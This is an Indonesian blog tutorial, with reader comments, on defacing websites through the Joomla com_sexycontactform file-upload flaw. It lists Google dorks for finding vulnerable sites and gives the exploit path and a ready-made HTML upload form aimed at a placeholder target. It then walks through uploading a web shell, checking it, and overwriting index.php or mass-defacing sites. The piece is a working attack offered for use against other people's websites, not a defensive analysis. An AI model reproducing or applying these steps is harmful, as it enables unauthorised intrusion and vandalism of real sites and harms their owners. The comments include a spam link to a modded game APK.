Turorial Deface Website Teknik Com Sexy + Tebas Index
Assalamualaikum sobat..
Udah pada tau belum deface website teknik com_sexy?
Bagi yang newbie, nih _MisterNotFound_ ajarin :3
Tuk mastah , nyimak aje ye :v
- BAHAN :
- Dork :
UMUM > inurl:/com_sexycontactform/
MY FAVORITE DORK > inurl:/components/com_sexycontactform/
- Exploit :
/components/com_sexycontactform/fileupload/index.php
- CSRF
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
NB : SAVE DENGAN FORMAT .html
<form method="POST"
action="http://www.TARGET.com/[path]/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>UNGGAH</button>
</form>
- Script Deface sampeyan ;)
- Masukkan dork ke search engine google.
- Masukkan exploitnya dibelakang url target. Jika vuln, maka akan tampil notice error.
- Check Your Shell. Caranya, masukkan ‘exploit check’ ini :
components/com_sexycontactform/fileupload/files/Your Shell.php
- Lalu terserah sampeyan mau diapakan tuh website. Mau mass deface ya silahkan, mau nitip nick silahkan. Nah kalo mau tebas index juga silahkan ;)
- Cara Tebas index, seperti gambar dibawah ini
NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
NOTE : CARI FILE INDEX.PHP . BIASANYA ADA DI DIREKTORI UTAMA DAN BERFORMAT .PHP
NOTE : Sebaiknya back-up dulu script index aslinya ;)
- Jika sudah selesai, tinggal klik SAVE
- Penampakan setelah diperawani :)















Sya cari tapi tidak ada yg Vuln ?
ReplyDeleteVery Nice post thanks a lot love this site
ReplyDeleteDownload Shadow fight 3 unlimited money apk